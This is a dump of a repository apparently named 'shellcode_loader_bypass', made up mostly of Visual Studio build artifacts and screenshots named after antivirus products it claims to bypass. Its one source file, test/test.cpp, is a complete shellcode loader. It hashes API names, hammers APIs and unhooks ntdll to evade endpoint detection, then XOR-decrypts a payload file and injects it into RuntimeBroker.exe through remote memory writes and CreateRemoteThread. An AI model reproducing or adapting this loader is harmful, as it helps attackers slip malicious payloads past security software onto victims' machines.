/bypass1/bypass1/x64/Release/bypass1.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.ipdb


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.log:
--------------------------------------------------------------------------------
1 |   bypass1.cpp
2 |   LINK : 已指定 /LTCG，但不需要生成代码；从链接命令行中移除 /LTCG 以提高链接器性能
3 |   bypass1.vcxproj -> C:\Users\Jason\source\repos\bypass1\x64\Release\bypass1.exe
4 | 


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.obj


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/Cl.items.tlog:
--------------------------------------------------------------------------------
1 | C:\Users\Jason\source\repos\bypass1\bypass1.cpp;C:\Users\Jason\source\repos\bypass1\bypass1\x64\Release\bypass1.obj
2 | 


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/bypass1.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
2 | Release|x64|C:\Users\Jason\source\repos\bypass1\|
3 | 


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/link.secondary.1.tlog:
--------------------------------------------------------------------------------
1 | ^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\BYPASS1\X64\RELEASE\BYPASS1.OBJ
2 | 


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.vcxproj.FileListAbsolute.txt


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/tp.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/tp.obj


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/vc143.pdb


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/bypass1.log:
--------------------------------------------------------------------------------
1 |   bypass1.cpp
2 |   LINK : 已指定 /LTCG，但不需要生成代码；从链接命令行中移除 /LTCG 以提高链接器性能
3 |   bypass1.vcxproj -> C:\Users\Jason\source\repos\bypass1\x64\Release\tp.exe
4 | 


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/bypass1.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/bypass1.obj


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/bypass1.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/bypass1.vcxproj.FileListAbsolute.txt


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\jason\source\repos\bypass1\tp\x64\release\bypass1.obj
 2 | c:\users\jason\source\repos\bypass1\x64\release\tp.exe
 3 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.command.1.tlog
 4 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.items.tlog
 5 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.read.1.tlog
 6 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\cl.write.1.tlog
 7 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.command.1.tlog
 8 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.read.1.tlog
 9 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.secondary.1.tlog
10 | c:\users\jason\source\repos\bypass1\tp\x64\release\tp.tlog\link.write.1.tlog
11 | 


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.exe.recipe:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project>
 3 |   <ProjectOutputs>
 4 |     <ProjectOutput>
 5 |       <FullPath>C:\Users\Jason\source\repos\bypass1\x64\Release\tp.exe</FullPath>
 6 |     </ProjectOutput>
 7 |   </ProjectOutputs>
 8 |   <ContentFiles />
 9 |   <SatelliteDlls />
10 |   <NonRecipeFileRefs />
11 | </Project>


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/tp.tlog/CL.command.1.tlog


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/tp.tlog/CL.read.1.tlog


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/tp.tlog/CL.write.1.tlog


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/Cl.items.tlog:
--------------------------------------------------------------------------------
1 | C:\Users\Jason\source\repos\bypass1\bypass1.cpp;C:\Users\Jason\source\repos\bypass1\tp\x64\Release\bypass1.obj
2 | 


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/tp.tlog/link.command.1.tlog


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/tp.tlog/link.read.1.tlog


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/link.secondary.1.tlog:
--------------------------------------------------------------------------------
1 | ^C:\USERS\JASON\SOURCE\REPOS\BYPASS1\TP\X64\RELEASE\BYPASS1.OBJ
2 | 


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/tp/x64/Release/tp.tlog/link.write.1.tlog


--------------------------------------------------------------------------------
/bypass1/tp/x64/Release/tp.tlog/tp.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.41.34120:TargetPlatformVersion=10.0.22621.0:
2 | Release|x64|C:\Users\Jason\source\repos\bypass1\|
3 | 


--------------------------------------------------------------------------------
/bypass1/x64/Release/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/x64/Release/shellcode.bin


--------------------------------------------------------------------------------
/bypass1/x64/Release/tp.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/x64/Release/tp.exe


--------------------------------------------------------------------------------
/images/360_bypass1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/images/360_bypass1.png


--------------------------------------------------------------------------------
/images/Defender_test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/images/Defender_test.png


--------------------------------------------------------------------------------
/images/huorong_bypass1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/images/huorong_bypass1.png


--------------------------------------------------------------------------------
/images/tencent_bypass1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/images/tencent_bypass1.png


--------------------------------------------------------------------------------
/test/test.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <tlhelp32.h>
  3 | #include <vector>
  4 | #include <fstream>
  5 | #include <iterator>
  6 | #include <winternl.h>
  7 | #include <threadpoolapiset.h>
  8 | #include <unordered_map>
  9 | #include <string>
 10 | 
 11 | #pragma comment(lib, "ntdll.lib")
 12 | 
 13 | std::unordered_map<DWORD, FARPROC> apiHashTable;
 14 | 
 15 | DWORD HashString(const char* str) {
 16 |     DWORD hash = 0;
 17 |     while (*str) {
 18 |         hash = ((hash << 5) + hash) + *str++;
 19 |     }
 20 |     return hash;
 21 | }
 22 | 
 23 | FARPROC ResolveAPI(DWORD hash) {
 24 |     if (apiHashTable.find(hash) != apiHashTable.end()) {
 25 |         return apiHashTable[hash];
 26 |     }
 27 | 
 28 |     HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
 29 |     if (!hNtdll) return nullptr;
 30 | 
 31 |     auto pExportDir = reinterpret_cast<PIMAGE_EXPORT_DIRECTORY>(
 32 |         reinterpret_cast<BYTE*>(hNtdll) +
 33 |         reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(hNtdll) +
 34 |             reinterpret_cast<PIMAGE_DOS_HEADER>(hNtdll)->e_lfanew)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
 35 | 
 36 |     auto pNames = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNames);
 37 |     auto pFunctions = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfFunctions);
 38 |     auto pOrdinals = reinterpret_cast<WORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNameOrdinals);
 39 | 
 40 |     for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
 41 |         const char* apiName = reinterpret_cast<const char*>(reinterpret_cast<BYTE*>(hNtdll) + pNames[i]);
 42 |         DWORD apiHash = HashString(apiName);
 43 | 
 44 |         if (apiHash == hash) {
 45 |             auto proc = reinterpret_cast<FARPROC>(reinterpret_cast<BYTE*>(hNtdll) + pFunctions[pOrdinals[i]]);
 46 |             apiHashTable[hash] = proc;
 47 |             return proc;
 48 |         }
 49 |     }
 50 |     return nullptr;
 51 | }
 52 | 
 53 | void APIHammering() {
 54 |     for (int i = 0; i < 100; i++) {
 55 |         LoadLibraryA("kernel32.dll");
 56 |         LoadLibraryA("user32.dll");
 57 |         GetModuleHandleA("ntdll.dll");
 58 |     }
 59 | }
 60 | 
 61 | void ObfuscateString(std::string& str, unsigned char key) {
 62 |     for (auto& c : str) {
 63 |         c ^= key;
 64 |     }
 65 | }
 66 | 
 67 | typedef BOOL(WINAPI* LPDSENUMATTRIBUTES)(void* lpShellcode);
 68 | 
 69 | void DecryptShellcode(std::vector<unsigned char>& shellcode, unsigned char key) {
 70 |     for (size_t i = 0; i < shellcode.size(); ++i) {
 71 |         shellcode[i] ^= key;
 72 |     }
 73 | }
 74 | 
 75 | void UnhookNtdll() {
 76 |     DWORD hashVirtualProtect = HashString("VirtualProtect");
 77 |     FARPROC pVirtualProtect = ResolveAPI(hashVirtualProtect);
 78 | 
 79 |     HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
 80 |     if (!hNtdll) return;
 81 | 
 82 |     wchar_t systemDir[MAX_PATH] = { 0 };
 83 |     GetSystemDirectory(systemDir, MAX_PATH);
 84 | 
 85 |     wchar_t ntdllPath[MAX_PATH] = { 0 };
 86 |     wcscat_s(ntdllPath, systemDir);
 87 |     wcscat_s(ntdllPath, L"\ntdll.dll");
 88 | 
 89 |     HANDLE hFile = CreateFile(ntdllPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
 90 |     if (hFile == INVALID_HANDLE_VALUE) return;
 91 | 
 92 |     DWORD fileSize = GetFileSize(hFile, nullptr);
 93 |     if (fileSize == INVALID_FILE_SIZE) {
 94 |         CloseHandle(hFile);
 95 |         return;
 96 |     }
 97 | 
 98 |     HANDLE hMapping = CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, fileSize, nullptr);
 99 |     if (!hMapping) {
100 |         CloseHandle(hFile);
101 |         return;
102 |     }
103 | 
104 |     void* pFileData = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
105 |     if (!pFileData) {
106 |         CloseHandle(hMapping);
107 |         CloseHandle(hFile);
108 |         return;
109 |     }
110 | 
111 |     auto pLoadedNtdll = reinterpret_cast<BYTE*>(hNtdll);
112 |     auto pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(pFileData);
113 |     auto pNtHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(pFileData) + pDosHeader->e_lfanew);
114 | 
115 |     auto pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
116 |     for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++) {
117 |         if (!strcmp(reinterpret_cast<char*>(pSectionHeader->Name), ".text")) {
118 |             DWORD oldProtect;
119 |             reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
120 |                 pLoadedNtdll + pSectionHeader->VirtualAddress,
121 |                 pSectionHeader->Misc.VirtualSize,
122 |                 PAGE_EXECUTE_READWRITE,
123 |                 &oldProtect
124 |                 );
125 | 
126 |             memcpy(
127 |                 pLoadedNtdll + pSectionHeader->VirtualAddress,
128 |                 reinterpret_cast<BYTE*>(pFileData) + pSectionHeader->PointerToRawData,
129 |                 pSectionHeader->SizeOfRawData
130 |             );
131 | 
132 |             reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
133 |                 pLoadedNtdll + pSectionHeader->VirtualAddress,
134 |                 pSectionHeader->Misc.VirtualSize,
135 |                 oldProtect,
136 |                 &oldProtect
137 |                 );
138 |             break;
139 |         }
140 |     }
141 | 
142 |     UnmapViewOfFile(pFileData);
143 |     CloseHandle(hMapping);
144 |     CloseHandle(hFile);
145 | }
146 | 
147 | void ExecuteShellcodeWithThreadpool(const std::vector<unsigned char>& shellcode) {
148 |     void* execMemory = VirtualAlloc(
149 |         nullptr,
150 |         shellcode.size(),
151 |         MEM_COMMIT | MEM_RESERVE,
152 |         PAGE_EXECUTE_READWRITE
153 |     );
154 | 
155 |     if (!execMemory) {
156 |         return;
157 |     }
158 | 
159 |     memcpy(execMemory, shellcode.data(), shellcode.size());
160 | 
161 |     PTP_WORK work = CreateThreadpoolWork(
162 |         [](PTP_CALLBACK_INSTANCE, void* context, PTP_WORK) {
163 |             auto shellcodePtr = reinterpret_cast<void(*)()>(context);
164 |             shellcodePtr();
165 |         },
166 |         execMemory,
167 |         nullptr
168 |     );
169 | 
170 |     if (work) {
171 |         SubmitThreadpoolWork(work);
172 |         WaitForThreadpoolWorkCallbacks(work, FALSE);
173 |         CloseThreadpoolWork(work);
174 |     }
175 | 
176 |     VirtualFree(execMemory, 0, MEM_RELEASE);
177 | }
178 | 
179 | DWORD FindProcessId(const wchar_t* processName) {
180 |     PROCESSENTRY32 pe32;
181 |     HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
182 |     if (hSnapshot == INVALID_HANDLE_VALUE) {
183 |         return 0;
184 |     }
185 | 
186 |     pe32.dwSize = sizeof(PROCESSENTRY32);
187 |     if (Process32First(hSnapshot, &pe32)) {
188 |         do {
189 |             if (!_wcsicmp(pe32.szExeFile, processName)) {
190 |                 CloseHandle(hSnapshot);
191 |                 return pe32.th32ProcessID;
192 |             }
193 |         } while (Process32Next(hSnapshot, &pe32));
194 |     }
195 | 
196 |     CloseHandle(hSnapshot);
197 |     return 0;
198 | }
199 | 
200 | void RemoteFunctionStompingInjection(const std::vector<unsigned char>& shellcode) {
201 |     DWORD processId = FindProcessId(L"RuntimeBroker.exe");
202 |     if (processId == 0) {
203 |         return;
204 |     }
205 | 
206 |     HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processId);
207 |     if (!hProcess) {
208 |         return;
209 |     }
210 | 
211 |     void* remoteMemory = VirtualAllocEx(hProcess, nullptr, shellcode.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
212 |     if (!remoteMemory) {
213 |         CloseHandle(hProcess);
214 |         return;
215 |     }
216 | 
217 |     if (!WriteProcessMemory(hProcess, remoteMemory, shellcode.data(), shellcode.size(), nullptr)) {
218 |         VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
219 |         CloseHandle(hProcess);
220 |         return;
221 |     }
222 | 
223 |     HMODULE hModule = GetModuleHandleA("kernel32.dll");
224 |     FARPROC loadLibraryAddr = GetProcAddress(hModule, "LoadLibraryA");
225 | 
226 |     HANDLE hThread = CreateRemoteThread(hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(remoteMemory), nullptr, 0, nullptr);
227 |     if (hThread) {
228 |         WaitForSingleObject(hThread, INFINITE);
229 |         CloseHandle(hThread);
230 |     }
231 | 
232 |     VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
233 |     CloseHandle(hProcess);
234 | }
235 | 
236 | int main() {
237 |     const char* filename = "shellcode.bin";
238 |     const unsigned char key = 0x5A;
239 | 
240 |     APIHammering(); // Add hammering before starting
241 |     UnhookNtdll();
242 | 
243 |     std::ifstream file(filename, std::ios::binary);
244 |     if (!file.is_open()) {
245 |         return -1;
246 |     }
247 | 
248 |     std::vector<unsigned char> encryptedShellcode(
249 |         (std::istreambuf_iterator<char>(file)),
250 |         std::istreambuf_iterator<char>()
251 |     );
252 |     file.close();
253 | 
254 |     if (encryptedShellcode.empty()) {
255 |         return -1;
256 |     }
257 | 
258 |     DecryptShellcode(encryptedShellcode, key);
259 | 
260 |     RemoteFunctionStompingInjection(encryptedShellcode);
261 | 
262 |     return 0;
263 | }


--------------------------------------------------------------------------------
/test/test.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.11.35303.130
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "test", "test.vcxproj", "{E178E088-6629-4401-8E22-F7BA9D927D22}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x64.Build.0 = Debug|x64
18 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Debug|x86.Build.0 = Debug|Win32
20 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x64.ActiveCfg = Release|x64
21 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x64.Build.0 = Release|x64
22 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x86.ActiveCfg = Release|Win32
23 | 		{E178E088-6629-4401-8E22-F7BA9D927D22}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {7A638454-64BA-4B7F-95DE-878858108F1A}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/test/test.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{e178e088-6629-4401-8e22-f7ba9d927d22}</ProjectGuid>
 25 |     <RootNamespace>test</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <ClCompile>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <SDLCheck>true</SDLCheck>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <ConformanceMode>true</ConformanceMode>
 79 |     </ClCompile>
 80 |     <Link>
 81 |       <SubSystem>Console</SubSystem>
 82 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 83 |     </Link>
 84 |   </ItemDefinitionGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 89 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 97 |       <OptimizeReferences>true</OptimizeReferences>
 98 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <SDLCheck>true</SDLCheck>
105 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
